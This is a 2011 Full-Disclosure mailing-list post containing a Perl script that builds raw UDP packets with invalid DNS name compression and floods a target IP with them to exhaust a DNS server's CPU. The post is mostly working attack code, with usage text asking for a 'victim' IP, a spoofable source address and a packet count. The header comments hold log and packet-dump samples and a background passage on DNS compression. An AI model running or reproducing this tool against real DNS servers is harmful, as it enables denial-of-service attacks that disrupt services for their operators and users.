full-disclosure-uk July 2011 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] Semi 0day DNS Invalid Comp

[Full-disclosure] Semi 0day DNS Invalid Compression attack

From: David <codeinjection_at_nospam>
Date: Sun Jul 10 2011 - 14:49:49 GMT
To: full-disclosure@lists.grok.org.uk

#!/usr/bin/perl
#
# DNS Invalid Compression attack coded by sipher (www.elitter.net)
#
# History:
# elitter.net provides Free UNIX shells and receives its more than fair
amount of DDoS's and DoS
# attacks. 1 lovely day someone targeted our DNS services and managed to
bring the system to 100%
# CPU usage.
#
# Goal:
#
# Reproduce following error message, hopefully get the same results of 100%
CPU usage.
#
# Error output:
#
# Jul 9 19:36:30 42262 mydns[26545]: 09-Jul-2011 19:36:30+359454 #24949
12337 UDP 202.164.36.27 000 000
# FORMERR Invalid_compression_method 13365 0 0 0 LOG N 006 ""
#
# Here is a sample of the packet (tcpdump -lnx port 53):
#
# 4500 002b 512f 4000 3411 92a9 2989 601e
# cc2d 0d15 e483 0035 0017 e98c 3031 3233
# 3435 3637 3839 4142 4344 4500 0000
#
# So next time you decide to attack someone. You might just squash your bug.
#
# Testbed:
# isc.org,dbjdns
#
# DNS packets use an ad-hoc compression method in which portions of domain
names can sometimes be replaced with two-byte pointers to previous domain
names.
# The precise rule is that a name can be compressed if it is a response
owner name, the name in NS data, the name in CNAME data, the name in PTR
data,
# the name in MX data, or one of the names in SOA data.
# One problem with DNS compression is the amount of code required to parse
it. Reliably locating all these names takes quite a bit of work that
# would otherwise have been unnecessary for a DNS cache. LZ77 compression
would have been much easier to implement.
#
# Another problem with DNS compression is the amount of code required to
correctly generate it. (RFC 1035 allowed servers to not bother compressing
# their responses; however, caches have to implement compression,so that
address lists from some well-known sites don't burst the seams of a DNS UDP
packet.)
# Not only does the compressor need to figure out which names can be
compressed, but it also needs to keep track of compression targets earlier
in the packet.
# RFC 1035 doesn't make clear exactly what targets are allowed.
# (Most versions of BIND do not use pointers except to compressible names;
suffixes of the query name are excluded. dnscache uses pointers to suffixes
of the query name.)
#
# -djb
#
# Shouts: burnout, hightech, spithash, pookie, #elitter@irc.elitter.net
#

# http://www.hsc.fr/ressources/outils/rawsock/index.html.en
use Net::RawSock;

if($#ARGV != 2) {
        print "--> DNS Invalid compression attack (www.elitter.net)\n";
        print "--> NOTE: Most ISP block spoofed UDP packets. Enter a valid
source address.\n";
        print "./compdns.pl < source address > < IP of victim > < # of
packets >\n";
        exit(0);
}

print "--> DNS Invalid compress attack\n";
$count = 1;
$sourceaddy = $ARGV[0];
$target = $ARGV[1];
$numpkt = $ARGV[2];

$dst_host = (gethostbyname($sourceaddy))[4];
$src_host = (gethostbyname($target))[4];

$dst_host = pack('a4', $dst_host);
$src_host = pack('a4', $src_host);

        while ($count <= $numpkt) {

                print "--> [$count]: ($sourceaddy)->($target)\n";

                my $pkt =
"\x45\x00\x00\x2b\x00\x00\x40\x00\x34\x11\x92\xa9".
                          # destination address
                          # Example: "\x43\x9f\x27\x94".
                          "$dst_host".
                          # source address
                          # Example: "\xcc\x2d\x0d\x12".
                          "$src_host".
                          # source port
                          "\xe4\x83".
                          # destination port
                          "\x00\x35".
                          # length
                          "\x00\x17".
                          # checksum null whore
                          "\x00\x00".
                          # data = junk

"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00".

"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00".

"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00";

                Net::RawSock::write_ip($pkt);
                $count++;
        }

print "--> Done.\n";

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/